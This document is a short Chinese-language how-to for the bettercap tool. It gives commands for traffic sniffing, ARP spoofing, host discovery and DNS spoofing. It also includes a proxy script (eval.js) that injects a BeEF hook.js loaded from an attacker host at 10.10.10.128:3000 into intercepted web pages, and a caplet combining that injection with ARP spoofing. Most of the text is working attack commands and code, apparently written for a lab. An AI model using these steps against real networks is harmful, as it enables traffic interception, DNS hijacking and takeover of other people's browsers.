安装
sudo apt install bettercap
启动
# 查看网卡
ifconfig
# 启动
sudo bettercap -iface eth0
模块
键入help
命令即可查看可使用的模块
# 开启流量嗅探
net.sniff on
# 开启arp欺骗
arp.spoof on
# 开始网络主机发现
net.recon on
# 显示主机列表缓存(默认按ip排序)
net.show
# 探测网络上的新主机
net.probe on
DNS欺骗
set dns.spoof.domains www.example.com
set dns.spoof.address 10.10.10.128
dns.spoof on
arp欺骗+js注入
eval.js
源码:
function onLoad(){
log("Bettercap loaded.");
}
function onResponse(req, res){
if(res.ContentType.indexOf('text/html')==0){ // 修改html文件的源码
var body = res.ReadBody();
log("inject js!");
if(body.indexOf('</head>') != -1){
res.Body = body.replace('
</head>',
// 以下内容为植入网页的js
'<script type="text/script" src="http://10.10.10.128:3000/hook.js"></script></head>');
}
}
}
可将命令保存为cap文件:
set http.proxy.script /root/Desktop/eval.js
set https.proxy.script /root/Desktop/eval.js
http.proxy on
https.proxy on
arp.spoof on
命令行运行bettercap -iface eth0 -caplets /root/Desktop/xx.cap
植入js操作在https页面时可能导致浏览器警告网页证书不可信,也可能导致浏览器访问超时
网页植入beef 的hook.js后在控制端未看到该主机,不知什么原因
wireshark 查看导出的流量
set net.sniff.output /root/Desktop/test.pcap
net.sniff on
arp.spoof on